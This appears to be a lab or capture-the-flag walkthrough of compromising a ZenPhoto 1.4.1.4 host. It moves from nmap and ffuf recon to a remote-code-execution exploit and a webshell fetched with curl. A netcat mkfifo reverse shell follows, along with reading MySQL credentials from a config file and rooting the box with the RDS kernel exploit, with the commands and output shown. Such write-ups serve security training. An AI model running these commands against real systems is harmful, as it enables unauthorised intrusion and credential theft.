Recon & Enumeration
1
2
# autorecon
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN full_tcp_nmap.txt 192.168.123.41
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 83:92:ab:f2:b7:6e:27:08:7b:a9:b8:72:32:8c:cc:29 (DSA)
|_ 2048 65:77:fa:50:fd:4d:9e:f1:67:e5:cc:0c:c6:96:f2:3e (RSA)
23/tcp open ipp CUPS 1.4
|_http-server-header: CUPS/1.4
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-title: 403 Forbidden
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
3306/tcp open mysql MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (95%), Linux 2.6.32 (93%), Linux 2.6.35 (93%)
Ffuf
1
2
3
ffuf -u http://192.168.123.41/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -c -t 40
test [Status: 301, Size: 315, Words: 20, Lines: 10]
- http://192.168.123.41/test/
- Powered by zenPHOTO
- Google: zenphoto
- https://github.com/zenphoto/zenphoto
- This gives us the directory structure so now we can go through files and check for any files with sensitive information, version number, etc to aid in further enumeration
- If we view the source for
http://192.168.123.41/test/and search for version or scroll to the bottom, we see version number mentioned there
1
<!-- zenphoto version 1.4.1.4 [8157] (Official Build) THEME: default (index.php) GRAPHICS LIB: PHP GD library 2.0 { memory: 128M } PLUGINS: class-video colorbox deprecated-functions hitcounter security-logger tiny_mce zenphoto_news zenphoto_sendmail zenphoto_seo -->
- http://192.168.123.41/test/robots.txt
1
2
3
4
5
6
7
Disallow: /test/albums/
Disallow: /test/cache/
Disallow: /test/themes/
Disallow: /test/zp-core/
Disallow: /test/zp-data/
Disallow: /test/page/search/
Disallow: /test/uploaded/
Exploitation
searchsploit zenphoto- ZenPhoto 1.4.1.4 - ‘ajax_create_folder.php’ Remote Code Execution
php 18083.php 192.168.123.41 /test/whoami => www-datacurl 192.168.49.123/shell.php -o /var/www/test/shell.php- We do not have write access to the web root directory
- This shell was very restricted so I got another proper reverse shell with netcat
nc -lvnp 23- since port 23 was also open on the target- Then run the following reverse shell one liner from the PHP shell we have:
1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.123 23 >/tmp/f
Privilege Escalation
- There is MySQL running on this machine as we know from our nmap scan so I started looking for files with MySQL credentials
cat /var/www/test/zp-data/zp-config.php
1
2
3
4
5
# zp-data/zp-config.php
$conf['mysql_user'] = 'root';
$conf['mysql_pass'] = 'hola';
$conf['mysql_host'] = 'localhost';
$conf['mysql_database'] = 'zenphoto';
1
2
3
4
5
6
7
8
9
10
11
12
mysql> select id, user, name, pass from zp_administrators;
+----+----------------+----------+------------------------------------------+
| id | user | name | pass |
+----+----------------+----------+------------------------------------------+
| 1 | administrators | group | NULL |
| 2 | viewers | group | NULL |
| 3 | bozos | group | NULL |
| 4 | album managers | template | NULL |
| 5 | default | template | NULL |
| 6 | newuser | template | NULL |
| 7 | admin | admin | 63e5c2e178e611b692b526f8b6332317f2ff5513 |
+----+----------------+----------+------------------------------------------+
- Could not crack that hash so moved on to kernel exploits since this kernel version is really old
uname -a => Linux offsecsrv 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux- LinPEAS suggested RDS kernel exploit and dirtycow
- Reliable Datagram Sockets (RDS) Linux Privilege Escalation (Linux Kernel 2.6.30 < 2.6.36-rc8)
1
2
3
4
5
6
Possible Exploits:
[+] [CVE-2010-3904] rds
Details: http://www.securityfocus.com/archive/1/514379
Exposure: highly probable
Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},[ ubuntu=10.04{kernel:2.6.32-(21|24)-generic} ]
Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c
wget 192.168.49.123/linux-rds-exploit.c -P /dev/shm/
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
www-data@offsecsrv:/dev/shm$ gcc linux-rds-exploit.c -o rds-exploit
www-data@offsecsrv:/dev/shm$ chmod +x rds-exploit
www-data@offsecsrv:/dev/shm$ ./rds-exploit
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xf821d980
[+] Resolved rds_ioctl to 0xf8217090
[+] Resolved commit_creds to 0xc016dcc0
[+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# whoami
root
1
2
3
4
5
6
7
8
9
10
root@offsecsrv:/root#
whoami && hostname && ifconfig | grep inet && cat proof.txt
root
offsecsrv
inet addr:192.168.123.41 Bcast:192.168.123.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feba:b881/64 Scope:Link
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
4444cb0a0a33ab90abc85d121d2554